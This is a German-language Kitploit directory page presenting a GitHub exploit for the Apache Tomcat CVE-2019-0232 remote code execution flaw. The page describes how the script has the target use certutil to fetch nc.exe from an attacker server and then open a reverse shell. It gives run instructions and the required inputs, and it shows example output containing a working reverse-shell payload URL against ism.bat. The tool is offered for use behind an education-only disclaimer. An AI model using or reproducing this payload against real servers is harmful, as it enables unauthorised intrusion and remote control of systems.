Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-0232 — Hallo, dies ist ein überarbeiteter und verbesserter Code für CVE-2019-0232 | Kitploit
Tools/GitHubGitHub/dharan10/cve-2019-0232
Payload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubdharan10/cve-2019-0232

CVE-2019-0232

Hallo, dies ist ein überarbeiteter und verbesserter Code für CVE-2019-0232

Repository anzeigen
22vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Exploit für Apache Tomcat CVE-2019-0232

Dieses Skript nutzt die Sicherheitslücke CVE-2019-0232 in Apache Tomcat aus, die durch die unsachgemäße Handhabung des Skripts ism.bat eine Remote-Codeausführung ermöglicht. Das Skript verwendet eine Reverse-Shell-Technik mit certutil und nc.exe (Netcat), um Remote-Zugriff auf das verwundbare System zu erlangen.

Sicherheitslücken-Übersicht:

  • CVE-ID: CVE-2019-0232
  • Betroffene Produkte: Apache Tomcat 6.x, 7.x, 8.x und 9.x
  • Beschreibung:
    • CVE-2019-0232 ist eine Sicherheitslücke in der Handhabung von Anfragen an ism.bat durch Apache Tomcat, die es Angreifern ermöglichen könnte, beliebige Befehle auf dem Server auszuführen. Diese Schwachstelle tritt aufgrund fehlender ordnungsgemäßer Validierung von Benutzereingaben auf, sodass Angreifer durch eine speziell gestaltete Anfrage die Ausführung beliebiger Befehle auslösen können.
    • Die Sicherheitslücke kann ausgenutzt werden, um eine schädliche nc.exe-Datei von einem entfernten Server herunterzuladen und damit eine Reverse-Shell zu starten.

Anforderungen:

  • Python 3: Das Skript ist für Python 3.x ausgelegt.
  • Netcat: Ein Netcat-Listener (nc.exe) muss auf einem Server für die Reverse-Shell-Verbindung gehostet werden.
  • Apache Tomcat: Der Zielserver muss eine verwundbare Version von Apache Tomcat (6.x, 7.x, 8.x oder 9.x) ausführen, die anfällig für CVE-2019-0232 ist.

Funktionsweise:

  1. Herunterladen von nc.exe: Das Skript sendet eine präparierte Anfrage an den verwundbaren Tomcat-Server, um die Datei nc.exe (Netcat) mithilfe von certutil auf das Zielsystem herunterzuladen.
  2. Reverse Shell: Sobald nc.exe heruntergeladen wurde, wird eine weitere Anfrage gesendet, um den Reverse-Shell-Befehl auszuführen, der zurück zum Netcat-Listener des Angreifers verbindet.

Verwendung:

1. Repository klonen:

root@kitploit:~
git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232

2. Skript bearbeiten oder mit Benutzereingaben ausführen:

root@kitploit:~
python3 exploit.py

3. Sie werden aufgefordert, die folgenden Details einzugeben:

root@kitploit:~
Target Host: The IP address of the Apache Tomcat server to exploit.
Target Port: The port of the target server (default: 8080).
Server IP: The IP address of the server hosting nc.exe.
Server Port: The port number where nc.exe is hosted (default: 80).
Netcat Listener IP: Your IP address that will receive the reverse shell.
Netcat Listener Port: The port on which you are listening for the reverse shell.

Beispiel:

root@kitploit:~
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe

Nach erfolgreicher Ausführung sollten Sie eine Reverse-Shell-Verbindung zu Ihrem Netcat-Listener haben.

Haftungsausschluss:

Dieses Skript ist ausschließlich für Bildungszwecke bestimmt. Verwenden Sie es nicht für böswillige Aktivitäten. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie Penetrationstests oder Sicherheitsaudits durchführen. Missbrauch dieses Skripts kann rechtliche Konsequenzen haben.

Wichtige Hinweise:

  • Stellen Sie sicher, dass der Apache Tomcat-Server nicht gegen CVE-2019-0232 gepatcht ist, bevor Sie diesen Exploit verwenden.
  • Das Skript kann je nach Konfiguration des Zielsystems Administratorrechte erfordern.

Autor:

Autor: A!Z3N(Dharan) Erstellt mit Power!

Lizenz:

Dieses Projekt ist unter der MIT-Lizenz lizenziert.

Allerdings: Nutzung auf eigene Gefahr. Dieser Code wird ausschließlich zu Bildungszwecken bereitgestellt. Durch die Nutzung dieses Codes erklären Sie sich damit einverstanden, die volle Verantwortung für alle Handlungen zu übernehmen, die sich aus seiner Nutzung ergeben. Missbrauch oder unbefugte Nutzung dieses Exploits kann zu rechtlichen Konsequenzen führen. Holen Sie stets eine entsprechende Genehmigung ein, bevor Sie Sicherheitstests oder Penetrationstests an einem System durchführen.

Sie sind frei, diesen Code zu verwenden, zu modifizieren und zu verbreiten, jedoch nur für ethische Zwecke. Der Autor übernimmt keine Haftung für Schäden, die durch diesen Code verursacht werden.

Verwenden Sie diesen Exploit nicht ohne die ausdrückliche Genehmigung des Eigentümers des Zielsystems.

Tool herunterladen